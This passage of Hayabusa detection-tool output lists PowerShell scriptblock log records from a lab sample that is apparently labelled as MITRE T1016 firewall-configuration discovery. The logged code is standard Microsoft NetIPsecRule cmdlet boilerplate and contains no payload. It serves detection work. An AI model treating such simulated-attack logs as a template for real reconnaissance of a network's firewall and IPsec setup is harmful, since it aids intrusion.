[Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { 
$__cmdletization_exceptionHas",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.786 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"BeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) 
$__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if 
($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') 
-and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if 
($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 
'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Servers')) { [object]$__cmdletization_value = ${Servers} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Servers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Servers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Domains')) { [object]$__cmdletization_value = ${Domains} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Domains'; 
ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Domains'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EndpointType')) { [object]$__cmdletization_value = ${EndpointType} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AddressType')) { [object]$__cmdletization_value = ${AddressType} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AddressType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.AddressVersion'; Bindings = 'In'; Value = $__cmdletization_value; 
IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AddressType'; ParameterType = 'Microsoft.PowerSh",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.786 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"ell.Cmdletization.GeneratedTypes.NetSecurity.AddressVersion'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Output'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DnsServers')) { [object]$__cmdletization_value = ${DnsServers} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DnsServers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DnsServers'; 
ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('SyncPolicyDelta', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $false if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.786 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Update-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])] param( 
[Parameter(ParameterSetName='Query (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.ChangeAction] ${Action}, [Parameter(ParameterSetName='Query (cdxml)', ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', ValueFromPipelineByPropertyName=$true)] [string[]] ${IPv6Addresses}, [Parameter(ParameterSetName='Query (cdxml)', ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', ValueFromPipelineByPropertyName=$true)] [string[]] ${IPv4Addresses}, [Parameter(ParameterSetName='Query (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType] ${EndpointType}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] 
${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact 
($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Action')) { [object]$__cmdletization_value = ${Action} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.ChangeAction'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.ChangeAction'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IPv6Addresses')) { [object]$__cmdletization_value = ${IPv6Addresses} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IPv6Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IPv6Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null 
[object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IPv4Addresses')) { [object]$__cmdletization_value = ${IPv4Addresses} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IPv4Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IPv4Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EndpointType')) { [object]$__cmdletization_value = ${EndpointType} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EndpointType'; ParameterType = 